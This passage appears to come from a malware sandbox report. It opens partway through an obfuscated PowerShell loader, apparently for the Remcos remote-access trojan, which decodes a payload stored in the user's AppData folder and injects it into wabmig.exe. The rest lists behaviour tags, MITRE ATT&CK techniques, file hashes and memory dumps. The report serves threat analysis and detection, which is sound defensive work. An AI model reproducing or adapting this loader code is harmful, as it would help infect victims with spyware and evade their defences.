napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Network Service Discovery
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2188
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2608
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

1

T1046

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
af7231b859f1f938921415f25677fe4d

SHA1
178e961513a2c69c2e728b669094d3aaba0334a6

SHA256
1cb06231ab769179cd9bc3f269fbea4d71ff602a2b6e72c7d08607d84883772c

SHA512
a9e51040c1c918b9cbbecae286e96e5fc6101763f84eb1991eee0618684679aeb679e35ac1f55006a8cca3ecc8d6b67708e13aacd17ccc406f0d9645cfff3b01

Download Submit
C:\Users\Admin\AppData\Roaming\Indlaanet.Sor

Filesize
435KB

MD5
d1d94e8b3529057db3dc0cbe4e6f616a

SHA1
a4dd4b336557a88d2e165cd6f7aab679095efc33

SHA256
c19e7f8bf24326c8eda4569400e723dace3753f4edab2577f89b70585664cb15

SHA512
06460dd08693c88daab40c9c9621a1c85b7e07408e34e02bd01d8989b14dcf1caf082a8c58889bc131b97929c938fce63d87f64de08e5e0be256b2d97148ce6c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4G5V7FSVLLD559ULF77H.temp

Filesize
7KB

MD5
9651183b31b4c676f8a79b866e38c54d

SHA1
d940f56f2f29504fa3cc2e419b2a202dd3c6caee

SHA256
4cb22217e1041c28406dccf818220b03a4230b02c13bdd1828756837375d9499

SHA512
e88c0618684088e8474e3925706a00d804a7ff86e59d98f627b2c1436cf17d4082765eaae3aa024b9dd60b91885260f967942585317275c10169ba76d972507d

Download Submit
memory/1864-46-0x00000000013D0000-0x00000000045D5000-memory.dmp

Filesize
50.0MB

Download
memory/1864-27-0x0000000000360000-0x00000000013C2000-memory.dmp

Filesize
16.4MB

Download
memory/1864-22-0x00000000013D0000-0x00000000045D5000-memory.dmp

Filesize
50.0MB

Download
memory/2188-21-0x0000000006910000-0x0000000009B15000-memory.dmp

Filesize
50.0MB

Download
memory/2548-10-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-12-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-14-0x000007FEF546E000-0x000007FEF546F000-memory.dmp

Filesize
4KB

Download
memory/2548-15-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-16-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-9-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-11-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-4-0x000007FEF546E000-0x000007FEF546F000-memory.dmp

Filesize
4KB

Download
memory/2548-8-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-6-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-47-0x000007FEF51B0000-0x000007FEF5B4D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-7-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/2548-5-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing